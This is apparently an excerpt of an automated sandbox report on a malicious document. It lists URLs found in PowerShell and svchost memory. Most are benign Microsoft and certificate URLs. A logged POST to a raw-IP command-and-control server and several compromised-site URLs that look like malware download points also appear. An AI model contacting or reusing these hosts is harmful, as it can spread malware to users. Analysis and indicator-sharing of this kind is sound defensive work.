                Source: unknownHTTP traffic detected: POST /hzctvbal94fl2bqa/ HTTP/1.1DNT: 0Referer: 173.249.20.233/hzctvbal94fl2bqa/Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 173.249.20.233:443Content-Length: 8516Connection: Keep-AliveCache-Control: no-cache
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://apps.identruz
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
                Source: svchost.exe, 0000000F.00000003.745654937.00000279643DA000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.dig
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                Source: powershell.exe, 00000004.00000002.700748377.000002712B6E5000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/D
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: http://gmpg.org/xfn/11
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://hotelshivansh.com/UserFiles/8/
                Source: powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmpString found in binary or memory: http://isatechnology.com
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: svchost.exe, 0000000F.00000003.740951157.00000279643C7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: svchost.exe, 0000000F.00000003.745654937.00000279643DA000.00000004.00000001.sdmpString found in binary or memory: http://oneocsp.mic
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://ownitconsignment.com/files/b/
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000004.00000002.697362222.00000271148A3000.00000004.00000001.sdmpString found in binary or memory: http://physio-svdh.ch
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0-
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/03
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.
                Source: powershell.exe, 00000004.00000003.687729373.000002712B84E000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                Source: powershell.exe, 00000004.00000002.689707383.00000271135D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                Source: svchost.exe, 0000000F.00000003.740940111.00000279643C9000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                Source: powershell.exe, 00000004.00000002.697418447.00000271148FC000.00000004.00000001.sdmpString found in binary or memory: http://www.isatechnology.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.aadrm.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.office.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.onedrive.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://b2bcom.com.br/site/0H/
                Source: powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmpString found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.entity.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                Source: svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749484580.00000279643DF000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cortana.ai/api
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://cr.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.cortana.ai
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://devnull.onenote.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://directory.services.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: svchost.exe, 0000000F.00000003.749469958.000002796435B000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.749374070.00000279643ED000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: powershell.exe, 00000004.00000002.690538281.00000271137E5000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: powershell.exe, 00000004.00000002.698282309.0000027114DD0000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000004.00000002.700973531.000002712B7C0000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://graph.windows.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: svchost.exe, 0000000F.00000003.742299178.0000027964371000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742084704.00000279643D8000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.742108249.0000027964351000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://layerslider.kreaturamedia.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lifecycle.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.microsoftonline.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.local
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://management.azure.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://messaging.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.contentsync.
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: powershell.exe, 00000004.00000002.699571574.0000027123779000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeapps.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: DC97C0E2-E492-4CE8-9253-DB063F2B7EA0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: powershell.exe, 00000004.00000002.697393668.00000271148BF000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.694935802.00000271141E5000.00000004.00000001.sdmp